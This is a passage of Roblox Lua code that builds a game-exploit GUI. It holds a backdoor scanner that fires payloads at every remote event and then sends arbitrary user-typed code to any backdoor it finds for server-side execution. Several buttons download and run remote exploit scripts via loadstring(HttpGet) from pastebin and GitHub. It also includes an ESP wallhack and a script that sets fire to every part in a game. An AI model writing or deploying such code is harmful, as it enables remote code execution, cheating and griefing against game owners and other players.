G2L["48"] = Instance.new("UIStroke", G2L["44"]);



-- StarterGui.main.mainframe.exec.text.TextBox
G2L["49"] = Instance.new("TextBox", G2L["44"]);
G2L["49"]["CursorPosition"] = -1;
G2L["49"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["49"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["49"]["BorderSizePixel"] = 0;
G2L["49"]["TextSize"] = 14;
G2L["49"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["49"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["49"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["49"]["RichText"] = true;
G2L["49"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["49"]["AutomaticSize"] = Enum.AutomaticSize.XY;
G2L["49"]["MultiLine"] = true;
G2L["49"]["ClearTextOnFocus"] = false;
G2L["49"]["PlaceholderText"] = [[-- loadstring or code here]];
G2L["49"]["Size"] = UDim2.new(0, 326, 0, 233);
G2L["49"]["Position"] = UDim2.new(0.08683, 0, 0, 0);
G2L["49"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["49"]["Text"] = [[]];
G2L["49"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.exec.text.TextBox.UIStroke
G2L["4a"] = Instance.new("UIStroke", G2L["49"]);



-- StarterGui.main.mainframe.exec.text.TextBox.UIStroke
G2L["4b"] = Instance.new("UIStroke", G2L["49"]);
G2L["4b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.exec.text.TextBox.LocalScript
G2L["4c"] = Instance.new("LocalScript", G2L["49"]);



-- StarterGui.main.mainframe.exec.text.TextBox.LocalScript
G2L["4d"] = Instance.new("LocalScript", G2L["49"]);



-- StarterGui.main.mainframe.exec.TextButton
G2L["4e"] = Instance.new("TextButton", G2L["43"]);
G2L["4e"]["TextWrapped"] = true;
G2L["4e"]["BorderSizePixel"] = 0;
G2L["4e"]["TextSize"] = 14;
G2L["4e"]["TextScaled"] = true;
G2L["4e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4e"]["BackgroundTransparency"] = 1;
G2L["4e"]["Size"] = UDim2.new(0, 113, 0, 43);
G2L["4e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4e"]["Text"] = [[Execute]];
G2L["4e"]["Position"] = UDim2.new(0.01961, 0, 0.82373, 0);


-- StarterGui.main.mainframe.exec.TextButton.UIStroke
G2L["4f"] = Instance.new("UIStroke", G2L["4e"]);



-- StarterGui.main.mainframe.exec.TextButton.UIStroke
G2L["50"] = Instance.new("UIStroke", G2L["4e"]);
G2L["50"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.exec.TextButton.LocalScript
G2L["51"] = Instance.new("LocalScript", G2L["4e"]);



-- StarterGui.main.mainframe.exec.TextButton
G2L["52"] = Instance.new("TextButton", G2L["43"]);
G2L["52"]["TextWrapped"] = true;
G2L["52"]["BorderSizePixel"] = 0;
G2L["52"]["TextSize"] = 14;
G2L["52"]["TextScaled"] = true;
G2L["52"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["52"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["52"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["52"]["BackgroundTransparency"] = 1;
G2L["52"]["Size"] = UDim2.new(0, 94, 0, 43);
G2L["52"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["52"]["Text"] = [[Clear]];
G2L["52"]["Position"] = UDim2.new(0.35574, 0, 0.82373, 0);


-- StarterGui.main.mainframe.exec.TextButton.UIStroke
G2L["53"] = Instance.new("UIStroke", G2L["52"]);



-- StarterGui.main.mainframe.exec.TextButton.UIStroke
G2L["54"] = Instance.new("UIStroke", G2L["52"]);
G2L["54"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.exec.TextButton.LocalScript
G2L["55"] = Instance.new("LocalScript", G2L["52"]);



-- StarterGui.main.mainframe.exec.TextButton
G2L["56"] = Instance.new("TextButton", G2L["43"]);
G2L["56"]["TextWrapped"] = true;
G2L["56"]["BorderSizePixel"] = 0;
G2L["56"]["TextSize"] = 14;
G2L["56"]["TextScaled"] = true;
G2L["56"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["56"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["56"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["56"]["BackgroundTransparency"] = 1;
G2L["56"]["Size"] = UDim2.new(0, 114, 0, 43);
G2L["56"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["56"]["Text"] = [[Execute from Clipboard]];
G2L["56"]["Position"] = UDim2.new(0.63585, 0, 0.82373, 0);


-- StarterGui.main.mainframe.exec.TextButton.UIStroke
G2L["57"] = Instance.new("UIStroke", G2L["56"]);



-- StarterGui.main.mainframe.exec.TextButton.UIStroke
G2L["58"] = Instance.new("UIStroke", G2L["56"]);
G2L["58"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.exec.TextButton.LocalScript
G2L["59"] = Instance.new("LocalScript", G2L["56"]);



-- StarterGui.main.mainframe.ssexec
G2L["5a"] = Instance.new("Frame", G2L["2"]);
G2L["5a"]["Visible"] = false;
G2L["5a"]["BorderSizePixel"] = 0;
G2L["5a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5a"]["Size"] = UDim2.new(0, 357, 0, 295);
G2L["5a"]["Position"] = UDim2.new(0.13976, 0, 0.09231, 0);
G2L["5a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5a"]["Name"] = [[ssexec]];
G2L["5a"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.ssexec.text
G2L["5b"] = Instance.new("ScrollingFrame", G2L["5a"]);
G2L["5b"]["Active"] = true;
G2L["5b"]["BorderSizePixel"] = 0;
G2L["5b"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["5b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5b"]["Name"] = [[text]];
G2L["5b"]["AutomaticCanvasSize"] = Enum.AutomaticSize.XY;
G2L["5b"]["Size"] = UDim2.new(0, 357, 0, 233);
G2L["5b"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5b"]["ScrollBarThickness"] = 8;
G2L["5b"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.ssexec.text.TextLabel
G2L["5c"] = Instance.new("TextLabel", G2L["5b"]);
G2L["5c"]["BorderSizePixel"] = 0;
G2L["5c"]["TextSize"] = 14;
G2L["5c"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["5c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5c"]["BackgroundTransparency"] = 1;
G2L["5c"]["Size"] = UDim2.new(0, 31, 0, 234);
G2L["5c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5c"]["Text"] = [[1]];
G2L["5c"]["AutomaticSize"] = Enum.AutomaticSize.Y;


-- StarterGui.main.mainframe.ssexec.text.TextLabel.UIStroke
G2L["5d"] = Instance.new("UIStroke", G2L["5c"]);
G2L["5d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.ssexec.text.TextLabel.UIStroke
G2L["5e"] = Instance.new("UIStroke", G2L["5c"]);



-- StarterGui.main.mainframe.ssexec.text.UIStroke
G2L["5f"] = Instance.new("UIStroke", G2L["5b"]);



-- StarterGui.main.mainframe.ssexec.text.TextBox
G2L["60"] = Instance.new("TextBox", G2L["5b"]);
G2L["60"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["60"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["60"]["BorderSizePixel"] = 0;
G2L["60"]["TextSize"] = 14;
G2L["60"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["60"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["60"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["60"]["RichText"] = true;
G2L["60"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["60"]["AutomaticSize"] = Enum.AutomaticSize.XY;
G2L["60"]["MultiLine"] = true;
G2L["60"]["ClearTextOnFocus"] = false;
G2L["60"]["PlaceholderText"] = [[-- require or code here]];
G2L["60"]["Size"] = UDim2.new(0, 326, 0, 233);
G2L["60"]["Position"] = UDim2.new(0.08683, 0, 0, 0);
G2L["60"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["60"]["Text"] = [[]];
G2L["60"]["BackgroundTransparency"] = 1;


-- StarterGui.main.mainframe.ssexec.text.TextBox.UIStroke
G2L["61"] = Instance.new("UIStroke", G2L["60"]);



-- StarterGui.main.mainframe.ssexec.text.TextBox.UIStroke
G2L["62"] = Instance.new("UIStroke", G2L["60"]);
G2L["62"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.ssexec.text.TextBox.LocalScript
G2L["63"] = Instance.new("LocalScript", G2L["60"]);



-- StarterGui.main.mainframe.ssexec.text.TextBox.LocalScript
G2L["64"] = Instance.new("LocalScript", G2L["60"]);



-- StarterGui.main.mainframe.ssexec.exec
G2L["65"] = Instance.new("TextButton", G2L["5a"]);
G2L["65"]["TextWrapped"] = true;
G2L["65"]["BorderSizePixel"] = 0;
G2L["65"]["TextSize"] = 14;
G2L["65"]["TextScaled"] = true;
G2L["65"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["65"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["65"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["65"]["BackgroundTransparency"] = 1;
G2L["65"]["Size"] = UDim2.new(0, 113, 0, 43);
G2L["65"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["65"]["Text"] = [[Execute]];
G2L["65"]["Name"] = [[exec]];
G2L["65"]["Position"] = UDim2.new(0.01961, 0, 0.82373, 0);


-- StarterGui.main.mainframe.ssexec.exec.UIStroke
G2L["66"] = Instance.new("UIStroke", G2L["65"]);



-- StarterGui.main.mainframe.ssexec.exec.UIStroke
G2L["67"] = Instance.new("UIStroke", G2L["65"]);
G2L["67"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.ssexec.TextButton
G2L["68"] = Instance.new("TextButton", G2L["5a"]);
G2L["68"]["TextWrapped"] = true;
G2L["68"]["BorderSizePixel"] = 0;
G2L["68"]["TextSize"] = 14;
G2L["68"]["TextScaled"] = true;
G2L["68"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["68"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["68"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["68"]["BackgroundTransparency"] = 1;
G2L["68"]["Size"] = UDim2.new(0, 94, 0, 43);
G2L["68"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["68"]["Text"] = [[Clear]];
G2L["68"]["Position"] = UDim2.new(0.71429, 0, 0.82373, 0);


-- StarterGui.main.mainframe.ssexec.TextButton.UIStroke
G2L["69"] = Instance.new("UIStroke", G2L["68"]);



-- StarterGui.main.mainframe.ssexec.TextButton.UIStroke
G2L["6a"] = Instance.new("UIStroke", G2L["68"]);
G2L["6a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.main.mainframe.ssexec.TextButton.LocalScript
G2L["6b"] = Instance.new("LocalScript", G2L["68"]);



-- StarterGui.main.mainframe.top.ImageButton.LocalScript
local function C_7()
local script = G2L["7"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent:Destroy()
	end)
end;
task.spawn(C_7);
-- StarterGui.main.mainframe.Dragify
local function C_9()
local script = G2L["9"];
	local frame = script.Parent
	local UIS = game:GetService("UserInputService")
	
	local dragging = false
	local dragStart = nil
	local startPos = nil
	
	-- When mouse or touch begins
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = frame.Position
		end
	end)
	
	-- When mouse or touch ends
	frame.InputEnded:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = false
		end
	end)
	
	-- Update position while dragging
	UIS.InputChanged:Connect(function(input)
		if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
			local delta = input.Position - dragStart
			frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		end
	end)
end;
task.spawn(C_9);
-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
local function C_e()
local script = G2L["e"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("info").Visible = true
		
		script.Parent.Parent.Parent:FindFirstChild("sc").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("exec").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("ssexec").Visible = false
	end)
end;
task.spawn(C_e);
-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
local function C_12()
local script = G2L["12"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("info").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("sc").Visible = true
		
		script.Parent.Parent.Parent:FindFirstChild("exec").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("ssexec").Visible = false
	end)
end;
task.spawn(C_12);
-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
local function C_15()
local script = G2L["15"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("info").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("sc").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("exec").Visible = true
		
		script.Parent.Parent.Parent:FindFirstChild("ssexec").Visible = false
	end)
end;
task.spawn(C_15);
-- StarterGui.main.mainframe.sectionbtns.TextButton.LocalScript
local function C_18()
local script = G2L["18"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("info").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("sc").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("exec").Visible = false
		
		script.Parent.Parent.Parent:FindFirstChild("ssexec").Visible = true
	end)
end;
task.spawn(C_18);
-- StarterGui.main.mainframe.info.ImageLabel.LocalScript
local function C_1c()
local script = G2L["1c"];
	-- Place this LocalScript inside the ImageLabel
	local Players = game:GetService("Players")
	local imageLabel = script.Parent
	local player = Players.LocalPlayer
	
	-- Wait until the player is fully loaded
	if not player.Character then
		player.CharacterAdded:Wait()
	end
	
	-- Get the player's thumbnail
	local function updateThumbnail()
		local userId = player.UserId
		local thumbnailType = Enum.ThumbnailType.HeadShot
		local thumbnailSize = Enum.ThumbnailSize.Size420x420
		
		local content, isReady = Players:GetUserThumbnailAsync(userId, thumbnailType, thumbnailSize)
		if isReady then
			imageLabel.Image = content
		end
	end
	
	updateThumbnail()
end;
task.spawn(C_1c);
-- StarterGui.main.mainframe.info.TextLabel.LocalScript
local function C_1f()
local script = G2L["1f"];
	script.Parent.Text = 'Welcome, ' .. game.Players.LocalPlayer.Name .. '!'
end;
task.spawn(C_1f);
-- StarterGui.main.mainframe.info.TextLabel.LocalScript
local function C_23()
local script = G2L["23"];
	-- Place this LocalScript inside a TextLabel (e.g., StarterGui.ScreenGui.TextLabel)
	local textLabel = script.Parent
	
	-- Check FilteringEnabled status
	local isFE = game:GetService("Workspace").FilteringEnabled
	
	-- Update text based on status
	if isFE then
		textLabel.Text = "FE: ON"
		textLabel.TextColor3 = Color3.fromRGB(0, 255, 0) -- Green
	else
		textLabel.Text = "FE: OFF"
		textLabel.TextColor3 = Color3.fromRGB(255, 0, 0) -- Red
	end
end;
task.spawn(C_23);
-- StarterGui.main.mainframe.info.TextLabel.LocalScript
local function C_25()
local script = G2L["25"];
	-- Place this LocalScript inside a TextLabel
	local textLabel = script.Parent
	local replicatedStorage = game:GetService("ReplicatedStorage")
	
	-- Payload used to confirm backdoor
	local testPayload = 'local h = Instance.new("Hint") h.Parent = game.Workspace h.Text = ""'
	local confirmedBackdoor = nil
	local confirmedType = nil
	
	-- Clear any existing hints
	for _, h in ipairs(workspace:GetChildren()) do
		if h:IsA("Hint") and h.Text == "" then
			h:Destroy()
		end
	end
	
	-- Scan for RemoteEvent/RemoteFunction backdoors
	for _, obj in ipairs(replicatedStorage:GetDescendants()) do
		if obj:IsA("RemoteEvent") or obj:IsA("RemoteFunction") then
			pcall(function()
				if obj:IsA("RemoteEvent") then
					obj:FireServer(testPayload)
				elseif obj:IsA("RemoteFunction") then
					obj:InvokeServer(testPayload)
				end
			end)
			
			wait(0.5)
			
			for _, h in ipairs(workspace:GetChildren()) do
				if h:IsA("Hint") and h.Text == "" then
					confirmedBackdoor = obj
					confirmedType = obj.ClassName
					h:Destroy()
					
					textLabel.Text = "Backdoor: " .. obj.Name
					textLabel.TextColor3 = Color3.fromRGB(255, 255, 255) -- White
					break
				end
			end
			
			if confirmedBackdoor then break end
		end
	end
	
	-- If no backdoor found
	if not confirmedBackdoor then
		textLabel.Text = "Backdoor: None"
		textLabel.TextColor3 = Color3.fromRGB(255, 255, 255) -- White
	end
	
	-- Execution button logic
	local exec = script.Parent.Parent.Parent:FindFirstChild("ssexec") and script.Parent.Parent.Parent:FindFirstChild("ssexec"):FindFirstChild("exec")
	local textBox = script.Parent.Parent.Parent:FindFirstChild("ssexec") and script.Parent.Parent.Parent:FindFirstChild("ssexec"):FindFirstChild("text"):FindFirstChild("TextBox")
	
	if exec and textBox then
		exec.MouseButton1Click:Connect(function()
			local payload = textBox.Text
			if payload and confirmedBackdoor and confirmedType then
				pcall(function()
					if confirmedType == "RemoteEvent" then
						confirmedBackdoor:FireServer(payload)
					elseif confirmedType == "RemoteFunction" then
						confirmedBackdoor:InvokeServer(payload)
					end
				end)
			end
		end)
	else
		warn("Execution GUI components not found.")
	end
end;
task.spawn(C_25);
-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
local function C_2c()
local script = G2L["2c"];
	script.Parent.MouseButton1Click:Connect(function()
		-- Wait for the game's Lighting service and the Workspace
		local lighting = game:GetService("Lighting")
		local workspace = game:GetService("Workspace")
		
		-- Change the sky to red
		lighting.OutdoorAmbient = Color3.new(0.5, 0, 0)
		lighting.Ambient = Color3.new(0.5, 0, 0)
		lighting.FogColor = Color3.new(1, 0, 0) -- For a red fog effect
		lighting.FogEnd = 200 -- Adjust fog distance as needed
		lighting.TimeOfDay = "00:00:00" -- Set to midday for the brightest effect
		
		-- Create a function to add a big red fire to a part
		local function addRedFire(part)
			-- Check if the part already has fire
			if not part:FindFirstChild("Fire") then
				local fireEffect = Instance.new("Fire")
				fireEffect.Size = 10 -- Increase size for a "big" fire
				fireEffect.Heat = 20 -- Increase heat for a more intense fire
				fireEffect.Color = Color3.new(1, 0, 0) -- Set the fire color to red
				fireEffect.Parent = part
			end
		end
		
		-- Function to iterate through all parts
		local function applyEffectsToAllParts()
			for _, child in pairs(workspace:GetDescendants()) do
				if child:IsA("BasePart") then
					addRedFire(child)
				end
			end
		end
		
		-- Apply the effects initially
		applyEffectsToAllParts()
		
		-- Use a `ChildAdded` connection to add fire to any new parts that are added to the Workspace
		workspace.DescendantAdded:Connect(function(newChild)
			if newChild:IsA("BasePart") then
				addRedFire(newChild)
			end
		end)
		
	end)
end;
task.spawn(C_2c);
-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
local function C_30()
local script = G2L["30"];
	script.Parent.MouseButton1Click:Connect(function()
		--[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		loadstring(game:HttpGet("https://pastebin.com/raw/YZnvHFFK"))()
	end)
end;
task.spawn(C_30);
-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
local function C_33()
local script = G2L["33"];
	script.Parent.MouseButton1Click:Connect(function()
		--[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
	end)
end;
task.spawn(C_33);
-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
local function C_36()
local script = G2L["36"];
	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/78n/SimpleSpy/main/SimpleSpyBeta.lua"))()
	end)
end;
task.spawn(C_36);
-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
local function C_39()
local script = G2L["39"];
	script.Parent.MouseButton1Click:Connect(function()
		--[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		loadstring(game:HttpGet("https://raw.githubusercontent.com/MiRw3b/c00lgui-v3rx/main/c00lguiv3rx.lua"))()
	end)
end;
task.spawn(C_39);
-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
local function C_3c()
local script = G2L["3c"];
	script.Parent.MouseButton1Click:Connect(function()
		-- Create the ScreenGui
		local gui = Instance.new("ScreenGui")
		gui.Name = "MusicPlayer"
		gui.ResetOnSpawn = false
		gui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
		
		-- Create the main Frame
		local frame = Instance.new("Frame")
		frame.Size = UDim2.new(0, 300, 0, 240)
		frame.Position = UDim2.new(0.5, -150, 0.5, -120)
		frame.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
		frame.BorderSizePixel = 0
		frame.Active = true
		frame.Draggable = true
		frame.Parent = gui
		
		-- Title Label
		local title = Instance.new("TextLabel")
		title.Size = UDim2.new(1, 0, 0, 30)
		title.BackgroundTransparency = 1
		title.Text = "FE Music Player"
		title.Font = Enum.Font.Code
		title.TextSize = 18
		title.TextColor3 = Color3.new(1, 1, 1)
		title.Parent = frame
		
		-- Sound ID TextBox
		local soundBox = Instance.new("TextBox")
		soundBox.Size = UDim2.new(1, -20, 0, 30)
		soundBox.Position = UDim2.new(0, 10, 0, 40)
		soundBox.PlaceholderText = "Sound ID here"
		soundBox.Font = Enum.Font.Code
		soundBox.TextSize = 16
		soundBox.TextColor3 = Color3.new(1, 1, 1)
		soundBox.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
		soundBox.Parent = frame
		
		-- Speed TextBox
		local speedBox = Instance.new("TextBox")
		speedBox.Size = UDim2.new(1, -20, 0, 30)
		speedBox.Position = UDim2.new(0, 10, 0, 80)
		speedBox.PlaceholderText = "Playback Speed"
		speedBox.Font = Enum.Font.Code
		speedBox.TextSize = 16
		speedBox.TextColor3 = Color3.new(1, 1, 1)
		speedBox.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
		speedBox.Parent = frame
		
		-- Volume TextBox
		local volumeBox = Instance.new("TextBox")
		volumeBox.Size = UDim2.new(1, -20, 0, 30)
		volumeBox.Position = UDim2.new(0, 10, 0, 120)
		volumeBox.PlaceholderText = "Volume (0 to 10)"
		volumeBox.Font = Enum.Font.Code
		volumeBox.TextSize = 16
		volumeBox.PlaceholderText = "Volume"
		volumeBox.TextColor3 = Color3.new(1, 1, 1)
		volumeBox.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
		volumeBox.Parent = frame
		
		-- Play Button
		local playButton = Instance.new("TextButton")
		playButton.Size = UDim2.new(0.48, -10, 0, 30)
		playButton.Position = UDim2.new(0, 10, 0, 170)
		playButton.Text = "Play"
		playButton.Font = Enum.Font.Code
		playButton.TextSize = 18
		playButton.TextColor3 = Color3.new(1, 1, 1)
		playButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		playButton.Parent = frame
		
		-- Stop Button
		local stopButton = Instance.new("TextButton")
		stopButton.Size = UDim2.new(0.48, -10, 0, 30)
		stopButton.Position = UDim2.new(0.52, 0, 0, 170)
		stopButton.Text = "Stop"
		stopButton.Font = Enum.Font.Code
		stopButton.TextSize = 18
		stopButton.TextColor3 = Color3.new(1, 1, 1)
		stopButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		stopButton.Parent = frame
		
		-- Sound Object
		local sound = Instance.new("Sound")
		sound.Name = "SkeletonSound"
		sound.Looped = true
		sound.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
		
		-- Play Button Logic
		playButton.MouseButton1Click:Connect(function()
			local id = tonumber(soundBox.Text)
			local speed = tonumber(speedBox.Text) or 1
			local volume = tonumber(volumeBox.Text) or 1
			
			if id then
				sound.SoundId = "rbxassetid://" .. id
				sound.PlaybackSpeed = speed
				sound.Volume = math.clamp(volume, 0, 10)
				sound.Looped = true
				sound:Play()
			else
				warn("Invalid Sound ID")
			end
		end)
		
		-- Stop Button Logic
		stopButton.MouseButton1Click:Connect(function()
			if sound.IsPlaying then
				sound:Stop()
			end
		end)
	end)
end;
task.spawn(C_3c);
-- StarterGui.main.mainframe.sc.scripts.TextButton.LocalScript
local function C_3f()
local script = G2L["3f"];
	script.Parent.MouseButton1Click:Connect(function()
		local Players = game:GetService("Players")
		local CoreGui = game.Players.LocalPlayer.PlayerGui
		
		local ESP_NAME = "ESPBox"
		
		-- Function to apply red ESP
		local function applyESP()
			for _, player in ipairs(Players:GetPlayers()) do
				if player ~= Players.LocalPlayer and player.Character then
					for _, part in ipairs(player.Character:GetChildren()) do
						if part:IsA("BasePart") then
							local box = Instance.new("BoxHandleAdornment")
							box.Adornee = part
							box.Size = part.Size
							box.Color3 = Color3.fromRGB(255, 0, 0)
							box.Transparency = 0.3
							box.AlwaysOnTop = true
							box.ZIndex = 10
							box.Name = ESP_NAME
							box.Parent = CoreGui
						end
					end
				end
			end
		end
		
		-- Function to clear red ESP
		local function clearESP()
			for _, obj in ipairs(CoreGui:GetChildren()) do
				if obj.Name == ESP_NAME then
					obj:Destroy()
				end
			end
		end
		
		-- Toggle logic
		local found = false
		for _, obj in ipairs(CoreGui:GetChildren()) do
			if obj.Name == ESP_NAME then
				found = true
				break
			end
		end
		
		if found then
			clearESP()
			print(" ESP disabled")
		else
			applyESP()
			print(" ESP enabled")
		end
	end)
end;
task.spawn(C_3f);
-- StarterGui.main.mainframe.exec.text.TextBox.LocalScript
local function C_4c()
local script = G2L["4c"];
	local textBox = script.Parent
	local parent = textBox.Parent
	local textLabel = parent:FindFirstChild("TextLabel")
	
	local function updateLineNumbers()
		if not textLabel then return end
		
		local lines = string.split(textBox.Text, "\n")
		local numberedLines = {}
		
		for i = 1, #lines do
			table.insert(numberedLines, tostring(i))
		end
		
		textLabel.Text = table.concat(numberedLines, "\n")
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(updateLineNumbers)
	
	updateLineNumbers()
end;
task.spawn(C_4c);
-- StarterGui.main.mainframe.exec.text.TextBox.LocalScript
local function C_4d()
local script = G2L["4d"];
	local textBox = script.Parent
	local lastText = ""
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local currentText = textBox.Text
		local cursor = textBox.CursorPosition
		
		-- Detect insertion
		if #currentText == #lastText + 1 then
			local typedChar = currentText:sub(cursor - 1, cursor - 1)
			
			local function insertPair(openChar, closeChar)
				local before = currentText:sub(1, cursor - 2)
				local after = currentText:sub(cursor)
				textBox.Text = before .. openChar .. closeChar .. after
				textBox.CursorPosition = #before + 2
			end
			
			if typedChar == "(" then
				insertPair("(", ")")
			elseif typedChar == "\"" then
				insertPair("\"", "\"")
			elseif typedChar == "'" then
				insertPair("'", "'")
			end
			
			-- Detect deletion of opening char
		elseif #currentText == #lastText - 1 then
			local deletedPos = cursor
			local deletedChar = lastText:sub(deletedPos, deletedPos)
			local nextChar = currentText:sub(deletedPos, deletedPos)
			
			local function shouldDeletePair(openChar, closeChar)
				return deletedChar == openChar and nextChar == closeChar
			end
			
			if shouldDeletePair("(", ")") or shouldDeletePair("\"", "\"") or shouldDeletePair("'", "'") then
				local before = currentText:sub(1, deletedPos - 1)
				local after = currentText:sub(deletedPos + 1)
				textBox.Text = before .. after
				textBox.CursorPosition = deletedPos
			end
		end
		
		lastText = textBox.Text
	end)
end;
task.spawn(C_4d);
-- StarterGui.main.mainframe.exec.TextButton.LocalScript
local function C_51()
local script = G2L["51"];
	script.Parent.MouseButton1Click:Connect(function()
		local code = script.Parent.Parent:FindFirstChild("text"):FindFirstChild("TextBox").Text
		
		loadstring(code)()
	end)
end;
task.spawn(C_51);
